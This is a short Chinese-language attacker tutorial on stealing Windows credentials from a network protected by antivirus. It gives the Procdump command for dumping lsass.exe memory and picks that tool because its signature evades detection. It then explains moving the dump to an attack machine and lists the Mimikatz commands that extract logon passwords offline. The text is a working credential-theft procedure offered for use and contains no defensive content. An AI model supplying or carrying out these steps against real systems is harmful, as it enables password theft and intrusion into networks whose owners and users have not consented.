内网有杀软又怎么抓

1. 使用 Procdump 转储 lsass.exe 进程

Procdump 是微软 Sysinternals 工具集中的一个合法程序，它的主要功能是创建进程的内存转储文件（Memory Dump）。这个工具通常被系统管理员用来诊断程序崩溃

由于 Procdump 是一个合法的、微软签名的工具，很多杀毒软件默认将其视为可信程序，或者至少不会像对待 Mimikatz 那样立即拦截它对 lsass.exe 的访问

• 命令： procdump64.exe -accepteula -ma lsass.exe lsass.dmp
• 解释：
  • -accepteula：接受许可协议，避免交互式提示
  • -ma：指定转储整个内存
  • lsass.exe：目标进程
  • lsass.dmp：输出的转储文件名

执行这个命令后，它会创建一个包含 lsass.exe 进程内存数据的 lsass.dmp 文件，并将其保存在磁盘上。这一步的重点在于：没有使用任何恶意工具，只使用了系统管理员常用的合法工具

2. 将转储文件下载到攻击机

这一步需要你将 lsass.dmp 文件从目标服务器下载到你的本地攻击机。你可以使用多种方法，例如：

• HTTP/HTTPS 文件传输： 在目标机器上通过 powershell 或其他工具，将文件上传到你搭建的 Web 服务器。
• SMB/SFTP 传输： 如果网络环境允许，通过 SMB 共享或 SFTP 传输文件

这个过程可能会被杀毒软件或网络安全设备检测到，因此需要注意。但即使被检测到，也只是一个数据传输行为，而不是一个恶意代码执行行为

3. 使用 Mimikatz 离线读取转储文件

当 lsass.dmp 文件下载到你的攻击机后，你就可以在你的本地机器上运行 Mimikatz，并让它去分析这个转储文件，而不是去连接目标机器的 lsass.exe 进程

• 命令：
  • mimikatz.exe
  • privilege::debug
  • sekurlsa::minidump lsass.dmp
  • sekurlsa::logonpasswords
• 解释：
  • privilege::debug：获取调试权限，这是 Mimikatz 正常工作所必需的
  • sekurlsa::minidump lsass.dmp：指定 Mimikatz 从 lsass.dmp 文件而不是实时进程中读取数据
  • sekurlsa::logonpasswords：从加载的转储文件中提取登录凭据

版权所有

许可证：署名 4.0 国际 (CC-BY-4.0)